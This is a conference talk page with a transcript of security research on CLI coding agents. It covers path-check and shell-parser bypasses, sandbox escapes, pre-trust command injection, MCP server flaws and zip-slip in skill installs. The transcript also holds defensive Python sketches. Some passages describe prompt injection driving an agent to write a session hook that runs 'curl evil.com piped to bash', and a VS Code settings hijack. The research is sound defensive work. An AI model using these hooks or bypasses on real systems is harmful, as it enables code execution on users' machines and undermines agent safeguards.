Not My Vibe: When AI Coding Agents Go Off the Rails

Name: Not My Vibe: When AI Coding Agents Go Off the Rails
Uploaded: 2026-05-12
Duration: 45 min 56 s
Description: A reverse-engineering study of CLI-based AI coding agents — Gemini CLI, Claude Code, and Codex — that uncovers systemic flaws including command injection, sandbox escapes, workspace trust issues, MCP server vulnerabilities, and zip-slip variants in skills/bundle installation. The speakers walk throu

BSidesSF · 2026 · 45:56 · 96 views · Published 2026-05

Speakers

Aonan Guan, Zhengyu Liu

Tags

Category: Research

Topic: AI/ML Security, GenAI Security, Vulnerability Research

Difficulty: Intermediary

Team: Red

Research: Case Studies and Incidents Analysis, Technical Deep-dives

Style: Talk

Mentioned in this talk

Tools used

Claude Code, Codex, Gemini CLI, VS Code

Service

Claude

Protocols

Model Context Protocol

About this talk

A reverse-engineering study of CLI-based AI coding agents — Gemini CLI, Claude Code, and Codex — that uncovers systemic flaws including command injection, sandbox escapes, workspace trust issues, MCP server vulnerabilities, and zip-slip variants in skills/bundle installation. The speakers walk through responsibly disclosed exploits, trace how agent security architectures evolved release by release, and offer recommendations for building safer, sandboxed, and verifiable agents.

Original YouTube description

Not My Vibe: When AI Coding Agents Go Off the Rails Aonan Guan, Zhengyu Liu We reveal a new attack surface in CLI AI agents. By reversing Gemini CLI, Claude Code, and Codex we found systemic flaws — command injection, workspace escapes, and cross-process RCEs. We demonstrate real exploits (responsibly fixed) and share lessons for safer, sandboxed, verifiable agents. https://bsidessf2026.sched.com/event/0a21cf65939a3e2eb38e20dc53b9d782

Transcript [en]

I will present to you our presenters. They're going to talk about "Not My Vibe: When AI Coding Agents Go Off the Rails." Take it away.

Thank you. Thank you everyone.

So we are Zhengyu and Gavin. Gavin could not come here today because of passport and visa issues, but he also contributed a lot. Thanks to Gavin. If you have used Claude Code, Gemini CLI, Codex, or any other AI agent before, you know vibe coding: you type a prompt, and the agent writes the code, runs the commands, and edits your files. If that feels like magic, today we're going to show you what happens when the magic goes wrong, and how the security of these tools has evolved in real time over the past year.

A quick show of hands: how many of you have used an AI agent in the last month? And how many of you have used YOLO mode, or auto-approve mode, or skip dangerous command? Okay, I see fewer hands. If you're using that mode, this talk is especially for you, and you will learn a lot.

So a quick introduction: I'm a security engineer at WiseLives, Zhengyu is a PhD student at Johns Hopkins University, and Gavin is an independent researcher. Together we have been doing deep-dive security research on AI coding agents, specifically the CLI-based agents. Over the past year, we have reported vulnerabilities to both Google and Anthropic and received multiple bounties, and today we're sharing what we learned. Our approach was different from typical security research. We did not only fuzz the endpoints; we also read the code, from the very early versions onward, release by release, and tracked how the security architecture evolved. That is the story we are telling today.

This is a screenshot I took from Steve's blog post about the future of coding agents. It captures the trend perfectly. In 2024, we had autocomplete, like figure one with the green lines: inline completion. Then in 2025, people started to use IDE extensions that ask yes or no before doing things, like figure two. Then came YOLO mode in figure three, where the agent just does everything without asking, and people started to go YOLO. And now, in figure four and beyond, the agent has taken over the whole IDE and then the whole workflow. The key insight here is that as agents get more autonomous, the security surface explodes, and every new capability is a new attack vector.

Let's take a look at how CLI agents work, to ground ourselves. Simplified, it is five steps. You launch the agent in your directory, which is your current working directory, and that becomes the agent's trust boundary. You type your natural language prompt, like "fix this bug" or "add a new login page," and the prompt is sent to the remote LLM. The LLM responds with an action, like "run this command" or "add a file with this specific file name." The local agent harness parses that response into an executable tool call, and that tool call asks for your permission. That permission step, acting as a filter, is the entire security model. The local agent is the gatekeeper between the LLM's intention and the actual system. And as we will see, the gatekeeper has a lot of holes.

Let's take this one as an example. This is the architecture diagram of Google's Gemini CLI, generated with DeepWiki, and it's pretty concrete. On the left, in blue, is the user loop: you type, you approve. In the middle, in purple, is the agent loop: it talks to the LLM, gets tool requests, runs them through a policy engine, and routes the output. The critical path is the right line here, from the LLM response through the policy engine to tool call execution. Many of the vulnerabilities we show today are about bypassing something on that path.

So let's think about how it can go wrong: the risks facing CLI agents. Many people don't realize that when you clone a repo and open it with your AI agent, you're not starting from a clean state. Just look at the project structure on the left: there are many markdown files, many configuration files, a .claude directory, skill files. In the middle is the real system prompt from Gemini CLI, and many of these files get embedded into the system prompt. This is a very good example of how external files influence your agent's behavior. And there are even more.

So there are actually three categories of input that attackers can control. The first is the files in the workspace. The second is the content that the agent retrieves dynamically, like a tool call that reads a file or a web fetch. The third is the extended surface, like MCP servers or agent skills that add new tools and capabilities. Each of them is a new trust boundary that the agent crosses without the user necessarily understanding the implications. Zhengyu will cover the extended surface right after me.

So how can it go wrong? This isn't theoretical. There are many real-world examples, from Gemini CLI to Amazon Q and then to the CI. The Amazon Q and the CI ones especially are both big supply chain issues that affected many other people. Now let's see how it actually works.

So we did a systematic empirical study. We went through the source code of Gemini CLI and Claude Code version by version: starting from the very early versions, we checked each release, read the diffs, and traced the architecture. Some of the vulnerabilities we are going to show were found by us, some by other researchers.

Let's start from the foundation. Everything starts with the CWD, the current working directory. When you launch Gemini CLI or another agent, the agent captures the current working directory, and that becomes the very first security boundary. Here is the actual code I captured from Gemini CLI, from a very early stage, an early release from July 2025. On the left, you can see the search results for "is within roots." This function is used across the code base. It appears in glob, in read file, in edit file, and in write file. So basically, whenever you call these tools to change your code, the call first passes through this function to check whether the file you want to touch is within the current working directory.

It sounds like a perfect solution. Using the CWD as a trust boundary makes intuitive sense: you launch your agent here, and it should only touch the files in your project, right? So what could possibly go wrong? It turns out, a lot.

So let's take a look. Path checking sounds simple, but just checking whether the path starts with your root directory turns out to be harder than we think. I'll show you some CVEs first.

The first CVE happened in a very early version of Claude Code. It's a prefix check: the path is validated against the current working directory by string prefix, so a path outside the directory that shares the same prefix can slip through. The second one is a symbolic link bypass. A symbolic link is a soft link that can point from a file inside your current working directory to a file outside it, and basically it tricks the CLI agent into thinking the file is inside the current working directory. This happened in 2025, but in 2026 another symbolic link problem happened again. People think it's an easy or simple problem, but it has happened multiple times in production software. The three we presented here were from Claude Code. We also found one in Gemini CLI and sent it to Google. Google didn't assign a CVE to it, but it's still a problem.
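The two failure modes just described can be sketched in a few lines. This is an illustrative Python sketch, not the code of either agent; the function names `naive_is_within` and `is_within_root` are hypothetical. The first function shows the string-prefix mistake, and the second resolves symlinks and compares whole path components.

```python
import os

def naive_is_within(path: str, root: str) -> bool:
    # Flawed check: a plain string prefix, so "/work/app-secrets"
    # passes for the root "/work/app", and symlinks are never resolved.
    return os.path.abspath(path).startswith(os.path.abspath(root))

def is_within_root(path: str, root: str) -> bool:
    # Resolve symlinks on both sides, then compare whole path components.
    real_path = os.path.realpath(path)
    real_root = os.path.realpath(root)
    return os.path.commonpath([real_path, real_root]) == real_root
```

With a workspace `/work/app`, a sibling directory `/work/app-secrets` passes the naive check but fails the component-wise one, and a symlink inside the workspace that points outside it is judged by where it actually leads.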

So let's talk about the big one: the shell tool. Take a look at this screenshot. Whenever we want to edit a file outside the current working directory, it gets blocked. The read file tool sees that I want to read a file outside the working directory and rejects it. Then on the right, I'm using cat to do a similar thing: I want to read a credential outside the current working directory. It didn't ask for my permission for that path. What I'm approving is just cat, and cat doesn't check the current working directory; read file does. So this is a fundamental problem: the file tools enforce the CWD boundary, but the shell tool doesn't. And it is really hard, because the shell can do anything and it has many variations.

So why is it so hard? As you can see, there are many shell commands here. From one command root, you can have infinite variations, and now multiply that by every shell built-in. That's a real problem, so be aware of that. Why can't we just parse a shell command and block the dangerous ones? It turns out that is not an easy problem, because bash syntax is genuinely complex. It's a full programming language. The commands listed here are some malicious ones, and it is very hard for anybody to parse them, split them, and understand them. Semantically, we cannot do it easily. And if we use a naive split, like the one shown below, or a regex, we will go wrong in the end. So we need a real parser.

Let's see how Gemini CLI built a parser, and trace the evolution. This one is from a very early Gemini CLI version, 0.1.8, the very first version. All the shell parsing logic was inline in the tool class, only 115 lines of code, and it is pretty simple. To bypass it, you just use a simple semicolon to chain your commands. That bypasses the command approval: the attacker appends a malicious command, and the detection never sees it.
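To make the semicolon bypass concrete, here is a minimal Python sketch. It is not Gemini CLI's logic; the allowlist and both function names are assumptions made for illustration. The naive check looks only at the first word, while the stricter one refuses any string containing shell control characters before doing a quoting-aware split.

```python
import shlex

ALLOWED_ROOTS = {"ls", "cat", "git"}  # hypothetical allowlist of approved commands
SHELL_META = set(";&|`$<>(){}\n")     # characters that can chain or substitute commands

def naive_is_approved(command: str) -> bool:
    # Flawed: inspects only the first whitespace-separated word.
    words = command.split()
    return bool(words) and words[0] in ALLOWED_ROOTS

def stricter_is_approved(command: str) -> bool:
    # Conservative: reject anything with shell control characters,
    # then check the first token of a quoting-aware split.
    if any(ch in SHELL_META for ch in command):
        return False
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes
        return False
    return bool(tokens) and tokens[0] in ALLOWED_ROOTS
```

The stricter check also rejects harmless commands such as a commit message containing a quoted semicolon. That over-blocking is the usual cost of character filtering, and it is one reason a real parser becomes attractive.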

Later on, in 0.18, they added a dedicated detect-command-substitution function that tries to catch dollar-sign substitution, backtick substitution, and process substitution. But look at the red box here: something is still missing. It can detect the left bracket, but it misses the right bracket. So we reported that the process substitution prevention was incomplete, and Google accepted the report and fixed it in a later version.

Since there were so many problems that could not be easily solved by regex or simple rule matching, Google started to use a real parser, Tree-sitter. In case you don't know, Tree-sitter is a parser for programming languages, and it is the same parser that is used in VS Code for syntax highlighting. It understands the full bash grammar: quoting rules, process substitution, everything related to arguments and strings. This is a massive upgrade from regex splitting, but it took Google three months to get there, from July to October. And to make it actually work properly, they spent another six months.

So even with Tree-sitter, a real parser, there was still a big problem. Let's take the time command as an example. The time command is used to measure the performance of a command: it wraps the command invocation and measures how long it takes. When users trusted time, they thought they were trusting only time. But what Gemini CLI actually sees is that you trust every command that follows time. So when an attacker appends a malicious command after time, such as a Python invocation, Gemini CLI trusts it, and that's a problem. This problem still existed in Gemini CLI 0.2.8. They fixed it in Gemini CLI 0.229, just last month, February 2026.
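One way to picture the wrapper problem: approval should apply to the command that actually runs, not to the wrapper in front of it. The Python sketch below is a simplified illustration and not the fix Google shipped. The `WRAPPERS` set and both function names are assumptions, and wrappers that take option values (for example `nice -n 10`) would need dedicated handling.

```python
import shlex

WRAPPERS = {"time", "nohup"}  # hypothetical, deliberately short list of wrapper commands

def effective_root(command: str) -> str:
    # Skip leading wrapper commands and their dash-prefixed flags,
    # and return the command that would actually be executed.
    tokens = shlex.split(command)
    i = 0
    while i < len(tokens) and tokens[i] in WRAPPERS:
        i += 1
        while i < len(tokens) and tokens[i].startswith("-"):
            i += 1
    return tokens[i] if i < len(tokens) else ""

def is_approved(command: str, approved_roots: set) -> bool:
    # Approving "time" no longer approves whatever follows it.
    return effective_root(command) in approved_roots
```

Under this sketch, a user who has approved `time` and `ls` would still be asked about `time python3 -c '...'`, because the effective command is `python3`.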

So yeah, it's time. Here's a comparison of the different milestones of Gemini CLI, and similar problems also happen in other CLI agents. Because of time limitations, we cannot explain all of the bypasses one by one, but you can take this table as an example. Also notice that Google spent more than nine months to make it work properly. Nine months of evolution from simple string matching to compiler-level parsing: this is the trend of security in this space, and it is still not complete. And it's not only Gemini. This one we captured from Claude Code's record. This is a full table of CVEs, and the shell command bypasses look like whack-a-mole: nine different bypasses and n CVEs, and I believe there will be more.

So let's take a look at this timeline. The pattern is pretty clear: the defense deepens, but the attack escalates. Every new defense creates new edge cases that can be exploited, and the attacker can always stay one step ahead, because they only need to find one bypass technique while the defender needs to cover all of the edge cases. It's a pretty complicated problem. That's why we need another approach, the sandbox approach. Let's invite Zhengyu to talk about the further techniques.

>> Okay, thank you Aonan. So I'll take over. It looks like shell parsing is a losing game, simply because you can never fully understand what a shell command will do just by parsing it. So why not just sandbox everything? We can run the agent in a restricted environment where it physically cannot access files outside the project or reach remote targets it is not allowed to. And actually, people started thinking about this problem a long time ago, right? Today we already have lots of reliable sandboxes. So why not use them?

What you're looking at here is Bubblewrap on Linux. It uses kernel namespaces to create isolated resources, like the file system, PID, network, and hostname namespaces, and pairs them with seccomp, so you can filter out all the syscalls you want to block. The idea is very simple, right? Instead of trying to understand every possible shell command that the LLM might give you, you just make sure that when a bad one gets executed, it will fail. It will never succeed.
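As a rough illustration of the namespace approach, the Python sketch below builds a Bubblewrap command line that exposes the host read-only, makes only the workspace writable, and cuts off the network. The helper name `bwrap_argv` and the chosen policy are assumptions, not what any of the agents actually run, and the seccomp filter mentioned above is not shown.

```python
from typing import List

def bwrap_argv(workspace: str, command: List[str],
               allow_network: bool = False) -> List[str]:
    # Build an argv for bubblewrap (bwrap); nothing is executed here.
    argv = [
        "bwrap",
        "--ro-bind", "/", "/",            # whole host file system, read-only
        "--dev", "/dev",                  # minimal /dev
        "--proc", "/proc",                # fresh /proc for the new PID namespace
        "--bind", workspace, workspace,   # only the workspace is writable
        "--unshare-pid",                  # separate PID namespace
        "--die-with-parent",              # kill the child if the agent exits
        "--chdir", workspace,
    ]
    if not allow_network:
        argv.append("--unshare-net")      # empty network namespace
    return argv + command
```

On a Linux machine with Bubblewrap installed, the result could be passed to `subprocess.run`, for example `subprocess.run(bwrap_argv("/home/me/project", ["ls", "-la"]))`.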

Here is a landscape of the current sandbox technologies across platforms. It's not a complete list, but it gives you an overview. On macOS we have Seatbelt, a kernel-level policy file that restricts file system access, network operations, and system calls, and this is what Apple has been using for app sandboxing. On Linux we have Bubblewrap plus seccomp for lightweight namespace isolation with syscall filtering. If you want something fancier and more complex, you can go with gVisor, a user-space kernel that reimplements the syscalls so that the application never talks to the host kernel directly. And on Windows we have things like restricted tokens plus job objects for process-level restrictions. So we can actually take advantage of a bunch of those sandboxes, right?

Now here is where it gets really interesting. All three major CLI agents, Gemini CLI, Claude Code, and Codex, support sandboxing, but they approach it in different ways. Take Codex as an example. It's a sandbox-first approach, and it's the only one that enables the sandbox by default. That means every shell command and every file edit tool call the agent makes gets spawned as a child process wrapped in Seatbelt on macOS or Bubblewrap plus seccomp on Linux, and the network is blocked by default. It looks like the most restrictive approach.

For Gemini CLI, the sandbox is disabled by default, unfortunately, but you can opt in via a sandbox flag. The exception is that Gemini CLI has a config so that if you use YOLO mode, it automatically enables the sandbox. When enabled, Gemini CLI does it in a slightly different way. It doesn't do what Codex does; instead it sandboxes the entire agent process. On macOS it also uses Seatbelt, and on Linux it uses a Docker container. That means everything, for example the shell commands, the file reads, and even other in-process reads, is constrained by the sandbox.

For Claude Code, it's also disabled by default, and when it's enabled, it does something like Codex: it wraps every individual Bash child process in the sandbox and executes it. As you can see, every agent supports a sandbox, but not all of them enable it by default. So if you think they are secure because they claim to have a sandbox, you need to double check whether you have actually enabled it.

And sandbox is also not a silver bullet. What if the sandbox itself has a bug? This is actually a vulnerability we found on 205, and it turns out that someone also identified it. So there's a collision, but that's fine, but we have to share it here. So basically, Claude Code provides a sandbox runtime library, and that library has a config that allows you to specify which domains you want the agent to connect to during the runtime. So basically it's a whitelist of the domains. If you do not pass that config, it means I do not want to set a whitelist, and then it will accept all the outgoing connections. That should work as expected. But if you put something in it — like I put example.com as a list and pass it to it — it means I would only allow the agent to connect to example.com during the runtime, and Claude would do so. This also works.

But what if I pass an empty array to Claude Code? It interprets it differently. As a whitelist, I mean that I do not allow any outgoing domains, but what it actually does is allow all outgoing connections. So there is a mismatch here. If we look at the code, it's a very simple programming bug, I would say. It checks the length of the passed-in allowed domains, and if the list is empty, it just disables the network policy. So setting allowed domains to empty basically allows all domains.
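The bug class described here, where an empty allowlist is treated as "no policy", can be sketched in Python. This is not the sandbox runtime's actual code; the function names are hypothetical, and the point is only the difference between "not configured" and "configured as empty."

```python
from typing import Optional, Sequence

def buggy_is_allowed(host: str, allowed_domains: Optional[Sequence[str]]) -> bool:
    # Mirrors the described bug: an empty list is falsy, so it is
    # handled exactly like "no allowlist configured" and allows everything.
    if not allowed_domains:
        return True
    return host in allowed_domains

def is_allowed(host: str, allowed_domains: Optional[Sequence[str]]) -> bool:
    # None means no policy was configured; an empty list means deny all.
    if allowed_domains is None:
        return True
    return host in allowed_domains
```

Distinguishing `None` from `[]` is the whole fix in this sketch: `is_allowed("evil.example", [])` is false, while the buggy version returns true.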

Let's take a look at another, more creative attack against the Claude Code sandbox. So far, what we understand is that when Claude Code is running, everything gets constrained. But what if malicious code, probably injected by the attacker through some kind of indirect or direct prompt injection, gets executed, only does normal-looking things during the sandboxed session, and then takes effect after the session is over? For example, in this case, during the sandboxed session the malicious content asks Claude to write to settings.json. It sounds like a normal request, because Claude's settings.json lives under its own directory in the workspace, and it didn't exist previously. So the sandbox will happily allow the write to complete.

But what the agent actually does is create a hook: on session start, run curl evil.com piped to bash. So basically we are overwriting a Claude Code config file that takes effect the next time Claude Code gets executed. The problem is this: the sandbox protects the current session, but it doesn't protect the files that control the next session. You could see it as a classic time-of-check to time-of-use issue that spans sessions.
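One possible way to close this gap is to treat files that configure future sessions as more sensitive than ordinary workspace files. The Python sketch below is an assumption about how such a check could look, not a description of any agent's behavior; the `PROTECTED` list and the function name are hypothetical and far from complete.

```python
import os

# Hypothetical list of workspace-relative files that influence a later session.
PROTECTED = (
    os.path.join(".claude", "settings.json"),
    os.path.join(".vscode", "settings.json"),
)

def needs_explicit_approval(path: str, workspace: str) -> bool:
    # True when a write targets a file that can control the next session,
    # even though the path itself is inside the workspace.
    rel = os.path.relpath(os.path.realpath(path), os.path.realpath(workspace))
    return any(rel == p or rel.endswith(os.sep + p) for p in PROTECTED)
```

A write to `src/main.py` would go through as usual, while a write to `.claude/settings.json` would be routed to a human approval step regardless of sandbox state.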

Besides the sandbox, let's look at something similar. From the last vulnerability, we have seen that the sandbox protects the runtime, meaning everything the agent generates and executes during the session. But what if there is code that can be executed before the sandbox even gets started? This is what we call the trust-before-trust problem. Whenever you open a workspace, the agent prompts you with a trust dialog: do you want to trust this workspace? But what if code gets executed before the trust decision even happens? That's actually how the problem occurs.

For example, in CVE 598-28, Claude Code would run yarn version at startup to check your environment. But the yarn command itself can have hooks, right? It will try to load plugins from the local yarnrc file. So if you put a malicious plugin in that rc file, it gets executed when Claude Code checks your environment during the bootstrapping process. Similarly, Claude Code also reads your git config and runs git config user email. But what if the attacker controls the user email and passes in a basic command injection payload, like a dollar-sign substitution wrapping a malicious command, and it gets passed to this command? Then another command injection problem happens.

And there are others, right? Previously we saw that you can control settings.json, and that basically controls how Claude Code works entirely. So there are many problems that happen during the bootstrapping process and can trigger code execution. In that case, the sandbox won't help.

So to summarize: CLI agents have become our everyday coding partners, but here's the reality. Claude Code alone had 22 cases in 10 months, and 19 of them are rated high. We're not blaming Claude here; on the contrary, they're doing a great job. They are trying to make the disclosure process as transparent as possible and to fix most of the vulnerabilities. But you can see the trend: as one security layer gets hardened, the attackers move to the next one. So don't be surprised when your coding agent gets hacked someday in the near future.

Okay, so let's jump to another topic, which is the software around the CLI agents, because nowadays people develop and use many things around the CLI agents to extend their behavior. That's what we call CLI extensions. Nowadays there are mainly two types of CLI AI agent extensions. The first one is MCP. I think most of you are aware of it, and if not, MCP is just a protocol that connects your agent to external tools and data sources. Usually an MCP server is a separate long-running service, running as a local process or remotely. For example, a Playwright server for browser automation, or a GitHub MCP server that allows your agent to retrieve data from GitHub. Usually your agent runs MCP clients that communicate with those servers, and it works like an external tool call.

Another category, proposed more recently, is called Skills. Skills are just packages of instructions, resources, and optional code that teach your agent task-specific workflows. At runtime, the agent sees the skill names and descriptions and loads the full instructions only when it decides to use one. So both of them extend the agent's capability, and you can think of MCP as external tool calls and Skills as a bunch of scripts with descriptions.

But here's something interesting: if we compare the security models of the two, they are different. Take this as an example. Say I want to access Google.com through Playwright in sandbox mode, and there are two ways to do it. On the left, Playwright runs as an MCP server; it navigates to Google.com and interacts with the page, and there's no problem, everything works perfectly. On the right, if we provide Playwright as an agent Skill, it gets an error: it tries to write into the Playwright cache directory, but it fails because it is blocked by the sandbox.

One might think this is just a simple read-file problem, where the sandbox refuses to let you read something outside the workspace, but actually it's not. The fundamental difference is that MCP servers are already-running processes that the agent talks to over a protocol, not processes that it spawns. So the sandbox within the agent has nothing to do with the MCP servers. The sandbox has no jurisdiction over those pre-existing processes. Skills, on the other hand, are tasks or scripts that eventually run through the provided Bash tool, so at that point the sandbox applies. But the sandbox cannot control MCP servers, so they run without any restrictions. So MCP servers live outside the box, right?

As you can imagine, even the official MCP servers have lots of vulnerabilities. Some of them were found by us, and those are marked in yellow. To name a few: for the file system MCP server, there are two CVEs. Both use classic techniques for bypassing workspace restrictions, just in another place. One uses symlink handling, the other uses a colliding path prefix. It sounds familiar because these are exactly the same bugs we have seen in the CLI agents themselves, repeated in the MCP server because MCP servers are implemented separately.

For the Git MCP server, there are also multiple CVEs. One is because you can run git init on arbitrary paths, so you can create a git repo at, or start tracking as a git repo, an arbitrary file system path. Another is argument injection in git diff: you can pass specific arguments to the git diff tool call, and it gives you an arbitrary file overwrite. Another is a path traversal in git add: you can use git add on a file outside the current working directory and stage it. Because validation is missing, you can stage the file and then retrieve its content, which gives you a file read. So there are many bugs within those MCP servers.

Another is within the MCP memory server. It's just a JSON write tool call: when the agent invokes it, it writes something as a memory to a local JSON file. But it has a loose JSON schema check during the write. So you can abuse that feature by passing an attacker-controlled path and some arbitrary JSON content, which gives you arbitrary JSON file writes on the file system. I believe if you search across all the MCP servers, there are more than that. Many of them are just classic injection problems, because to the agent these are just external tool calls: the agent may pass something malicious as the tool call arguments, and if your MCP server doesn't handle it correctly, injection happens.

So besides the MCP servers, what about the distribution and installation process? We all want to explore, discover, and install MCP servers provided by others in the wild. Claude Desktop offers one approach for that, called MCP bundles. This is an official distribution format: you install an MCP extension by just dragging and dropping a zip file onto Claude Desktop. But the problem here is that MCP bundles use fflate to handle the zip compression, and fflate has this zip-slip behavior: it simply returns the paths as stored in the zip and does not validate or sanitize them.

So if a malicious MCP bundle, let's say a zip file, contains a file whose path uses dot-dot-slash to traverse to another path, fflate will happily extract it there. So the classic zip-slip vulnerability shows up again in MCP bundles. Besides MCP servers, this zip-slip variant also appears in Gemini CLI's skills installation process, and we call it skills slip. Gemini CLI provides a very simple command, gemini skills install: you just pass a file path to the skill you want to install, and it stores it on your local system.
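A zip-slip guard boils down to checking every entry's resolved destination before writing anything. The Python sketch below illustrates the idea with the standard `zipfile` module; it is not the code of Claude Desktop or fflate, and the function name `safe_extract` is hypothetical. Python's own extractor already strips `..` components, so the explicit check is shown for clarity and for extractors that trust stored paths.

```python
import os
import zipfile

def safe_extract(zf: zipfile.ZipFile, dest: str) -> None:
    # Validate every entry first, so nothing is written if any entry is hostile.
    real_dest = os.path.realpath(dest)
    for info in zf.infolist():
        target = os.path.realpath(os.path.join(real_dest, info.filename))
        if os.path.commonpath([target, real_dest]) != real_dest:
            raise ValueError(f"blocked path traversal entry: {info.filename!r}")
    zf.extractall(real_dest)
```

An archive containing `../../evil.txt` or an absolute path is rejected as a whole, instead of being partially extracted.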

But the problem here is that it blindly trusts the skill's name, concatenates it with the target directory, uses the result as the destination path, and copies all the source files to that destination. So if you provide a skill name that uses dot-dot-slash path traversal patterns, you can get your skill copied or written to an arbitrary file path on the victim's system. For example, if I want to overwrite the VS Code settings.json, I can write a malicious skill like this.
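The missing step is validating the skill name before it is joined onto the install directory. The Python sketch below shows one conservative way to do that; it is not Gemini CLI's fix, and the function name and the allowed-character rule are assumptions.

```python
import os
import re

# Hypothetical rule: a skill name must be a single, plain directory name.
_SKILL_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]*")

def skill_destination(skills_dir: str, skill_name: str) -> str:
    # Reject separators, leading dots, and anything else outside the rule,
    # so the joined path cannot leave skills_dir.
    if not _SKILL_NAME.fullmatch(skill_name):
        raise ValueError(f"invalid skill name: {skill_name!r}")
    return os.path.join(skills_dir, skill_name)
```

A name such as `pdf-tools` maps to a directory under the skills folder, while `../../.vscode` is refused before any file is copied.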

I put a path traversal pattern in the skill's name, and inside I have a settings.json. That settings.json is a classic VS Code workspace hijack that leverages VS Code's integrated terminal profiles setting. So that code gets executed when you start a terminal in VS Code. The file just gets copied there, and when the victim launches another terminal, the code executes. Here we have a short video to show how this works.

So if we want to install a skill using Gemini CLI, we can just run this simple command. Gemini CLI shows the path we expect to install to, and it does alert the user that untrusted skills may affect the agent's runtime by running malicious commands. But the problem is that our attack happens even earlier, before the agent even gets started. Once the installation completes, we have already injected the command into the VS Code folder's settings.json. So in that case, we hijack the user's next terminal launch. And as you can see, the code gets executed.

Okay, so we have seen a lot of attacks so far. So what can we do now? To be honest, I don't think there are many things we can do as users, because we need to code every day, so we cannot just ban these tools. But there are some recommendations that we may be able to give. The first one is: do not blindly trust the agent and use YOLO mode. Treat it as a testing feature, not a production one. Then always keep a human approval step whenever the agent touches your critical repos or other critical things.

And the second is to try to audit your context files, because before your agent even runs, there are lots of files in your workspace that can basically control the agent's behavior. For example, AGENTS.md, and many of them are treated as part of the system prompt. So if the attacker controls one, it can basically instruct your agent to do malicious things. And also verify the commands that are being run at runtime. If anything is too complex to parse at a glance, you should not run it. And then finally, use the sandbox by default. Those sandboxes are at least still useful. You may get a lot of errors, but that's how the sandbox tries to protect you. So basically you can improve it by adjusting the policy that the sandbox uses day by day. You can gradually adjust it so that it works well with your setup.
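One way to act on the "audit your context files" advice is to snapshot those files and notice when they change. The sketch below is an assumption-laden illustration, not a feature of any agent: the file names in `CONTEXT_FILE_NAMES` are example names and should be replaced with whatever your agent actually reads, and both function names are hypothetical.

```python
import hashlib
import os

# Assumed example names; adjust to the context files your agent actually loads.
CONTEXT_FILE_NAMES = {"AGENTS.md", "GEMINI.md", "CLAUDE.md"}


def context_file_digests(workspace: str) -> dict:
    """Map each context file's relative path to the SHA-256 of its contents."""
    digests = {}
    for root, _dirs, files in os.walk(workspace):
        for name in files:
            if name in CONTEXT_FILE_NAMES:
                path = os.path.join(root, name)
                with open(path, "rb") as handle:
                    digest = hashlib.sha256(handle.read()).hexdigest()
                digests[os.path.relpath(path, workspace)] = digest
    return digests


def changed_files(before: dict, after: dict) -> list:
    """List context files that were added, removed, or modified."""
    return sorted(
        path
        for path in before.keys() | after.keys()
        if before.get(path) != after.get(path)
    )


if __name__ == "__main__":
    # Print the current inventory for the working directory.
    for path, digest in sorted(context_file_digests(".").items()):
        print(digest[:12], path)
```

Running the snapshot before and after pulling a branch or installing a dependency, and reading any file that `changed_files` reports, is one lightweight way to keep a human in the loop.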

And those are the things that we can do today. But stepping back, I think stopping prompt injection, and the command injection that those prompt injections lead to, really feels like an endless game, because every new agent, and the code around the agent, basically creates a new attack surface. So it's very hard to stay ahead of the attacker. So what I want to say here is that we still need robust and trustworthy agent systems, and hopefully we can make our agents more auditable and transparent, and also enable a secure-by-default mode across all those agents. And hopefully those will deliver both functionality and security in the near future, and that's something we should keep pushing forward. Thank you. That's all for our talk. Thank you.

All right. Thanks. We do have some room for questions. I've got one on Slido again. Slido's how we're going to do this. We're going to try to do this as fast as possible. So earlier you were showing some system prompts. Are those verified, or are they just what the LLM thinks the system prompt is?

Yeah. So for the system prompt, different software treats it differently. For Gemini and Antigravity, if there is a Markdown file sitting in the workspace, it will be directly embedded into the system prompt. So at the software level, they embed their whole system prompt, but it will automatically read the file first, then embed it into the system prompt, and then send it to the remote LLM.

All right, now here's one possible solution. Could an agent review the commands that are issued by the main LLM, or is that just as susceptible?

>> Yeah, so is the question about letting an agent review the command you want to run?

>> Right, having one LLM review the other before executing the commands?

>> Actually, I think that is one thing that happens in Claude Code. During our research, we found that if a command fails the static analysis and cannot be matched against the hardcoded patterns, Claude Code will sometimes use the Haiku model. From our research, it uses the Haiku model, which is a remote small model, to inspect the command you want to execute, decide whether it is safe or not, and find the actual root command. Previously, they didn't have Tree-sitter. If Tree-sitter cannot find the root command, it uses the Haiku model to find the root command.
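The "static analysis first, model as fallback" flow described in this answer can be sketched in the abstract. This is not Claude Code's implementation: the allowlist, the metacharacter set, and the `reviewer` callable (standing in for a small remote model) are all hypothetical, and a simple `shlex` split stands in for a real parser such as Tree-sitter.

```python
import shlex
from typing import Callable, Optional

# Hypothetical allowlist of root commands considered safe to auto-approve.
SAFE_ROOTS = {"ls", "cat", "pwd"}
# Characters that mean the string is more than one simple command.
SHELL_META = set(";&|`$()<>\n")


def static_root_command(command: str) -> Optional[str]:
    """Return the first word of a simple command, or None if it is too complex."""
    if any(ch in SHELL_META for ch in command):
        return None
    try:
        tokens = shlex.split(command)
    except ValueError:  # for example, unbalanced quotes
        return None
    return tokens[0] if tokens else None


def is_auto_approved(command: str, reviewer: Callable[[str], Optional[str]]) -> bool:
    """Try the static check first; ask the reviewer only when it gives up."""
    root = static_root_command(command)
    if root is None:
        # Fallback: the reviewer returns its guess at the root command, or None.
        root = reviewer(command)
    return root in SAFE_ROOTS


if __name__ == "__main__":
    def refuse_everything(command: str) -> Optional[str]:
        """Stand-in reviewer that never identifies a root command."""
        return None

    print(is_auto_approved("ls -la", refuse_everything))
    print(is_auto_approved("ls; rm -rf /", refuse_everything))
```

The sketch says nothing about whether the reviewer model is itself robust against injected instructions, which is the concern the question raises; in this design anything the reviewer cannot place on the allowlist still falls through to human approval.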

>> All right, I've accidentally closed my Slido session. I'm going to take more questions in here. Again, we're at bsidessf.org, or if you go to slido.com and type in the code BSidesSF2026 Theater14, we can get more questions. So how about here within the room? And I apologize if you're in an overflow theater and I can't see your questions.

>> Okay.

>> All right. Oh yeah, go ahead. Just ask it out loud and I'll repeat it. "What are you doing in your..." Yeah, so again, I'll repeat this.

>> So you advise against going in YOLO mode, but you know that's what makes the tokens go brr. So what do you do in your personal projects to really get things going?

